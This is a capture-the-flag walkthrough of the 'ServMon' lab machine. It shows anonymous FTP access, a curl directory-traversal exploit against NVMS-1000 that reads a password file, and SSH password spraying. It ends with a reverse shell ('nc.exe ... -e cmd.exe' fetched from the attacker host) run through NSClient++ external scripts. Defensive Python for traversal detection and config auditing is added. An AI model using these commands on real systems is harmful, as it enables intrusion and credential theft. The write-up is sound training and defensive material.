Proof of Concept

10.129.5.72

Nmap

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5666/tcp open  nrpe
6699/tcp open  napster
8443/tcp open  https-alt

Information Gathering

Collecting host information

┌──(kali㉿kali)-[~/ServMon]
└─$ nxc smb 10.129.5.72 --generate-hosts-file host
SMB         10.129.5.72      445    SERVMON          [*] Windows 10 / Server 2019 Build 17763 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
 
┌──(kali㉿kali)-[~/ServMon]
└─$ cat host
10.129.5.72     SERVMON.ServMon SERVMON

Configuring the /etc/hosts file

┌──(kali㉿kali)-[~/ServMon]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.5.72     SERVMON.ServMon SERVMON

Initial Access

Anonymous FTP login succeeds

┌──(kali㉿kali)-[~/ServMon]
└─$ ftp 10.129.5.72
Connected to 10.129.5.72.
220 Microsoft FTP Service
Name (10.129.5.72:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

A “Confidential.txt” file is found in the Users\Nadine directory

ftp> ls
229 Entering Extended Passive Mode (|||49677|)
125 Data connection already open; Transfer starting.
02-28-22  06:35PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49678|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM       <DIR>          Nadine
02-28-22  06:37PM       <DIR>          Nathan
226 Transfer complete.
ftp> dir
229 Entering Extended Passive Mode (|||49686|)
c125 Data connection already open; Transfer starting.
02-28-22  06:36PM       <DIR>          Nadine
02-28-22  06:37PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49687|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||49691|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************************************************|   168        0.56 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (0.56 KiB/s)

Reading “Confidential.txt” reveals that a “Passwords.txt” file containing passwords exists in the Desktop directory of the user “Nathan”

┌──(kali㉿kali)-[~/ServMon]
└─$ cat Confidential.txt
Nathan,
 
I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.
 
Regards
 
Nadine 

A “Notes to do.txt” file is found in the Users\Nathan directory

ftp> cd Nathan
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49680|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  182 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
229 Entering Extended Passive Mode (|||49681|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************************************************|   182        0.73 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (0.73 KiB/s)

Reading “Notes to do.txt”

┌──(kali㉿kali)-[~/ServMon]
└─$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint 

Accessing the web service on port 80 shows a login page for the “NVMS-1000” service

This service has a known Directory Traversal vulnerability (CVE-2019-20085)

Confirming that CVE-2019-20085 works

┌──(kali㉿kali)-[~/ServMon/NVMS1000-Exploit]
└─$ curl --path-as-is http://10.129.5.72/../../../../../../../../../../../../windows/win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Reading Passwords.txt through the vulnerability

┌──(kali㉿kali)-[~/ServMon/NVMS1000-Exploit]
└─$ curl --path-as-is http://10.129.5.72/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
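Added example, not from the original write-up: the path handling the NVMS-1000 web server lacked (resolve the request under the document root and refuse anything that escapes it), plus a detection over constructed access-log lines that catches the traversal request used above, including percent-encoded and backslash variants. The web root and log lines are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

def normalize_request_path(raw_path):
    """Decode percent-encoding twice (catches %252e) and treat backslashes
    as separators, so '..\\', '%2e%2e/' and '../' all look the same."""
    return unquote(unquote(raw_path)).replace("\\", "/")

def is_traversal_attempt(raw_path):
    """Detection view: any '..' segment after normalisation is suspicious."""
    return ".." in normalize_request_path(raw_path).split("/")

def safe_resolve(web_root, raw_path):
    """Server view: return the canonical path under web_root, or None if the
    request would escape it (the check the vulnerable handler did not make)."""
    root = posixpath.normpath(web_root)
    norm = normalize_request_path(raw_path).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, norm))
    if candidate == root or candidate.startswith(root.rstrip("/") + "/"):
        return candidate
    return None

# Constructed sample access-log lines in common log format (not from the box).
SAMPLE_LOG = """\
10.10.14.221 - - [01/Jan/2024:10:00:00 +0000] "GET /Pages/login.htm HTTP/1.1" 200 1532
10.10.14.221 - - [01/Jan/2024:10:00:05 +0000] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 92
10.10.14.221 - - [01/Jan/2024:10:00:09 +0000] "GET /%2e%2e/%2e%2e/Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 170
10.10.14.222 - - [01/Jan/2024:10:01:00 +0000] "GET /images/logo.png HTTP/1.1" 200 4096
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def flag_traversal(log_text):
    """Return (client, path) pairs for requests that carry a '..' segment."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits
```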

SSH authentication succeeds with Nadine:L1k3B1gBut7s@W0rk

┌──(kali㉿kali)-[~/ServMon/NVMS1000-Exploit]
└─$ nxc ssh servmon.servmon -u 'Nadine' -p passwords.txt -t 100
SSH         10.129.5.72      22     servmon.servmon  [*] SSH-2.0-OpenSSH_for_Windows_8.0
SSH         10.129.5.72      22     servmon.servmon  [-] Nadine:1nsp3ctTh3Way2Mars!
SSH         10.129.5.72      22     servmon.servmon  [-] Nadine:Th3r34r3To0M4nyTrait0r5!
SSH         10.129.5.72      22     servmon.servmon  [-] Nadine:B3WithM30r4ga1n5tMe
SSH         10.129.5.72      22     servmon.servmon  [+] Nadine:L1k3B1gBut7s@W0rk  Windows - Shell access!

Connecting over SSH with Nadine's credentials

┌──(kali㉿kali)-[~/ServMon/NVMS1000-Exploit]
└─$ sshpass -p 'L1k3B1gBut7s@W0rk' ssh nadine@servmon.servmon
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
 
nadine@SERVMON C:\Users\Nadine>

Read user.txt

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
213508c109346de95c5cff783e5a0c12
 
nadine@SERVMON C:\Users\Nadine\Desktop>ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::1ff
   IPv6 Address. . . . . . . . . . . : dead:beef::5481:7dff:ecdf:306
   Link-local IPv6 Address . . . . . : fe80::5481:7dff:ecdf:306%6
   IPv4 Address. . . . . . . . . . . : 10.129.5.72
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%6
                                       10.129.0.1

Privilege Escalation

A WinPEAS scan shows that the NSClient++ software is installed

<SNIP>
+----------¦ Installed Applications --Via Program Files/Uninstall registry--
+ Check if you can modify installed software https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications
    C:\Program Files\Common Files
    C:\Program Files\desktop.ini
    C:\Program Files\internet explorer
    C:\Program Files\MSBuild
    C:\Program Files\NSClient++
    C:\Program Files\NVMS-1000
    C:\Program Files\OpenSSH-Win64
    C:\Program Files\Reference Assemblies
    C:\Program Files\Uninstall Information
    C:\Program Files\VMware
    C:\Program Files\Windows Defender
    C:\Program Files\Windows Defender Advanced Threat Protection
    C:\Program Files\Windows Mail
    C:\Program Files\Windows Media Player
    C:\Program Files\Windows Multimedia Platform
    C:\Program Files\windows nt
    C:\Program Files\Windows Photo Viewer
    C:\Program Files\Windows Portable Devices
    C:\Program Files\Windows Security
    C:\Program Files\Windows Sidebar
    C:\Program Files\WindowsApps
    C:\Program Files\WindowsPowerShell
<SNIP>

The NSClient++ password is found in the nsclient.ini file

  • ew2x6SsGTxjRwXOT

PS C:\Program Files\NSClient++> Get-ChildItem -Path 'C:\Program Files\NSClient++\' -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue | Select-String "passw" -List
 
changelog.txt:54: * Removed erroneous error message bout web password
nsclient.ini:12:password = ew2x6SsGTxjRwXOT

A closer look at nsclient.ini also shows that access is allowed from localhost only

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
 
 
; in flight - TODO
[/settings/default]
 
; Undocumented key
password = ew2x6SsGTxjRwXOT
 
; Undocumented key
allowed hosts = 127.0.0.1
 
 
; in flight - TODO
[/settings/NRPE/server]
 
; Undocumented key
ssl options = no-sslv2,no-sslv3
 
; Undocumented key
verify mode = peer-cert
 
; Undocumented key
insecure = false
<SNIP>

Setting up SSH port forwarding

┌──(kali㉿kali)-[~/ServMon]
└─$ sshpass -p 'L1k3B1gBut7s@W0rk' ssh -L 8443:127.0.0.1:8443 nadine@servmon.servmon
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
 
nadine@SERVMON C:\Users\Nadine>

The NSClient++ web page is then reachable at https://127.0.0.1:8443, and the previously obtained password “ew2x6SsGTxjRwXOT” can be used to log in

Download nc.exe and evil.bat to c:\temp from the attacking machine

nadine@SERVMON C:\Users\Nadine>cd ..
nadine@SERVMON C:\Users>cd ..
nadine@SERVMON C:\>mkdir temp
nadine@SERVMON C:\>cd temp
nadine@SERVMON C:\temp>curl.exe -O http://10.10.14.221:8000/evil.bat
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    53  100    53    0     0     53      0  0:00:01 --:--:--  0:00:01   109
 
nadine@SERVMON C:\temp>curl.exe -O http://10.10.14.221:8000/nc.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 45272  100 45272    0     0  45272      0  0:00:01  0:00:01 --:--:-- 45272
 
nadine@SERVMON C:\temp>type evil.bat
@echo off
c:\temp\nc.exe 10.10.14.221 443 -e cmd.exe

Set up a reverse shell listener on the attacking machine

┌──(kali㉿kali)-[~/ServMon]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...

Under Settings > External Scripts > Scripts > Add new, create a foobar script that calls evil.bat

  • Section: /settings/external scripts/scripts/foobar
  • Key: command
  • Value: c:\temp\evil.bat

After creating the script, save the settings with Changes > Always save and restart with Control > Reload

Once the service has restarted, running the script from Queries > shell > Run connects the reverse shell

┌──(kali㉿kali)-[~/ServMon]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.221] from (UNKNOWN) [10.129.5.72] 49969
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Program Files\NSClient++>
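Added example, not part of the original write-up: an offline audit of an nsclient.ini that flags what made the path above work, namely the web server and external scripts modules being enabled, an external script section whose command lives outside the NSClient++ scripts directory (the foobar entry created through the web UI lands in the ini as such a section), and a weak NRPE setting. Section and key names follow the nsclient.ini shown earlier; the install path and the sample ini are constructed.

```python
import configparser
import ntpath
INSTALL_DIR = r"C:\Program Files\NSClient++"   # assumed install path (constructed)
SCRIPTS_DIR = ntpath.join(INSTALL_DIR, "scripts")
EXT_SCRIPTS = "/settings/external scripts/scripts/"
LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def _inside(path, base):
    # Resolve a relative or absolute Windows path and test whether it is under base.
    full = ntpath.normcase(ntpath.normpath(ntpath.join(INSTALL_DIR, path)))
    return full.startswith(ntpath.normcase(ntpath.normpath(base)) + "\\")

def audit_nsclient(ini_text):
    """Return a list of findings for the given nsclient.ini contents."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(ini_text)
    sec = lambda name: cfg[name] if cfg.has_section(name) else {}
    findings = []
    # Web UI plus external scripts lets anyone holding the web password run commands.
    for mod in ("WEBServer", "CheckExternalScripts"):
        if sec("/modules").get(mod.lower(), "").lower() in ("1", "enabled", "true"):
            findings.append(f"module {mod} is enabled")
    # 'allowed hosts' should stay loopback-only; note an SSH port forward still reaches it.
    for host in sec("/settings/default").get("allowed hosts", "").split(","):
        if host.strip() and host.strip() not in LOOPBACK:
            findings.append(f"allowed hosts permits {host.strip()}")
    if sec("/settings/NRPE/server").get("insecure", "false").lower() == "true":
        findings.append("NRPE server has insecure = true")
    # Each [/settings/external scripts/scripts/<name>] section holds a 'command' key.
    for section in cfg.sections():
        if section.startswith(EXT_SCRIPTS):
            command = cfg.get(section, "command", fallback="")
            target = command.split()[0] if command.split() else ""
            if not _inside(target, SCRIPTS_DIR):
                findings.append(f"{section} runs {command} outside {SCRIPTS_DIR}")
    return findings

# Constructed sample mirroring the layout of the nsclient.ini shown above.
SAMPLE_INI = """
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled
[/settings/default]
allowed hosts = 127.0.0.1
[/settings/NRPE/server]
insecure = true
[/settings/external scripts/scripts/check_disk]
command = scripts\\check_disk.bat
[/settings/external scripts/scripts/foobar]
command = c:\\temp\\evil.bat
"""
```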

Read root.txt

type root.txt
0450d679da4c4af55f11ec13fcf93efc
 
C:\Users\Administrator\Desktop>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::1b4
   IPv6 Address. . . . . . . . . . . : dead:beef::10ae:8f46:7b2d:e6c2
   Link-local IPv6 Address . . . . . : fe80::10ae:8f46:7b2d:e6c2%6
   IPv4 Address. . . . . . . . . . . : 10.129.5.72
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%6
                                       10.129.0.1